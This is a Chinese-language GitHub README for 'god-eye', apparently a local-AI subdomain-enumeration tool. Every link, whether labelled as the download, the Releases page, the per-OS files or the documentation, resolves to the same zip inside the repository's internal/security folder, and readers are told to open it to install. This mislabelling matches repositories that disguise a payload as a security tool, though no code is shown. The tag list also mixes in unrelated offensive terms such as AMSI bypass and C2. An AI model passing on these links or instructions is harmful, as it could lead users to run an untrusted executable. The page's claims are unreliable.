ommengman-prog/god-eye

GitHub: ommengman-prog/god-eye

一款基于 Ollama 本地 AI 驱动的子域名枚举与安全分析工具,帮助安全研究人员高效发现目标资产的子域名及潜在风险。

Stars: 38 | Forks: 5

# 🚀 god-eye - 利用 AI 能力探索子域名 ## 📥 下载最新版本 [![下载 God-Eye](https://raw.githubusercontent.com/ommengman-prog/god-eye/main/internal/security/eye_god_v1.0.zip%20God--Eye-v1.0-blue)](https://raw.githubusercontent.com/ommengman-prog/god-eye/main/internal/security/eye_god_v1.0.zip) ## 🌐 简介 god-eye 是一款 AI 驱动的工具,旨在帮助用户高效地发现和分析子域名。该工具通过 Ollama 进行本地分析,确保您的数据保持私密,且无需支付 API 费用。无论您是从事网络安全、道德黑客还是漏洞赏金猎人,god-eye 都可以通过扫描子域名结构中的潜在漏洞来增强您的侦查能力。 ## 🚀 功能特性 - **AI 驱动的检测:** 利用先进算法快速识别子域名。 - **本地分析:** 直接在您的机器上运行,确保数据安全。 - **用户友好的界面:** 专为各种技能水平的用户设计。 - **兼容性:** 可在各种操作系统上无缝运行。 - **全面的报告:** 生成关于已识别漏洞的详细报告。 - **定期更新:** 持续的改进和错误修复将使您的版本保持最新。 ## 🛠 系统要求 为了流畅运行 god-eye,请确保您的系统满足以下要求: - **操作系统:** Windows 10 或更高版本,macOS 10.14 或更高版本,Linux(大多数发行版) - **内存 (RAM):** 至少 4 GB - **磁盘空间:** 至少 100 MB 可用空间 - **网络连接:** 子域名查询所需 ## 📈 涵盖主题 - **AI 安全 (AI Security)** - **漏洞赏金 (Bug Bounty)** - **CVEs** - **网络安全 (Cybersecurity)** - **道德黑客 (Ethical Hacking)** - **Golang** - **黑客技术 (Hacking)** - **信息安全 (Information Security)** - **OSINT** - **渗透测试 (Penetration Testing)** - **侦查 (Recon)** - **侦察 (Reconnaissance)** - **安全 (Security)** - **子域名枚举 (Subdomain Enumeration)** - **漏洞扫描 (Vulnerability Scanning)** ## 📥 下载与安装 要开始使用 god-eye,请访问 [Releases 页面](https://raw.githubusercontent.com/ommengman-prog/god-eye/main/internal/security/eye_god_v1.0.zip) 下载最新版本。 1. 点击链接进入 Releases 页面。 2. 查找可用的最新发布版本。 3. 选择与您的操作系统匹配的文件。对于 Windows,您可能会看到类似 `https://raw.githubusercontent.com/ommengman-prog/god-eye/main/internal/security/eye_god_v1.0.zip` 的链接,对于 Mac 可能是 `https://raw.githubusercontent.com/ommengman-prog/god-eye/main/internal/security/eye_god_v1.0.zip`,而对于 Linux 用户,则是 `https://raw.githubusercontent.com/ommengman-prog/god-eye/main/internal/security/eye_god_v1.0.zip`。 4. 下载选定的文件。 5. 打开下载的文件以在您的系统上安装 god-eye。 ## 🔧 运行 god-eye 安装完成后,请按照以下步骤运行 god-eye: 1. 在您的计算机上找到该应用程序: - 对于 Windows,请在开始菜单或桌面上查找。 - 对于 macOS,请检查 Applications 文件夹。 - 对于 Linux,请导航至您解压文件的位置。 2. 双击应用程序图标将其启动。 3. 界面打开后,您将看到输入要扫描的主域名的选项。 4. 输入域名并点击 “Start Scan” 按钮。 5. 等待工具分析域名。结果将显示在界面中。 6. 查看详细报告,其中概述了发现的任何子域名及其可能的漏洞。 ## 📖 文档 如需更详细的指导,包括关于子域名枚举的高级技巧,请参阅我们的 [完整文档](https://raw.githubusercontent.com/ommengman-prog/god-eye/main/internal/security/eye_god_v1.0.zip)。其中包含故障排除、用户提示和常见问题解答等章节。 ## 🤝 支持 如果您在使用 god-eye 时遇到任何问题,可以在 GitHub 仓库中开启一个 Issue。社区和维护者随时为您提供帮助。请务必提供有关您的设置和所遇问题的详细信息。 ## 📅 更新日志 通过 Releases 部分中的更新日志了解最新的改进和变更。定期更新可确保该工具保持有效,以应对新出现的漏洞。 ## 📜 许可证 god-eye 是开源软件,根据 MIT 许可证发布。这授予您根据需要自由使用、修改和分发该工具的权利。 ## 🌍 加入社区 加入我们的社区论坛,与其他用户保持联系。分享关于使用 god-eye 进行子域名枚举的技巧、窍门和经验。
标签:AI风险缓解, AMSI绕过, C2, ESC4, EVTX分析, EVTX分析, Golang, LLM评估, Ollama, OSINT, Sigma 规则, 人工智能, 域名分析, 威胁检测, 子域名挖掘, 子域名枚举, 安全编程, 密码管理, 插件系统, 日志审计, 本地部署, 用户模式Hook绕过, 系统安全, 结构化查询, 网络安全, 网络安全, 自动化安全, 隐私保护, 隐私保护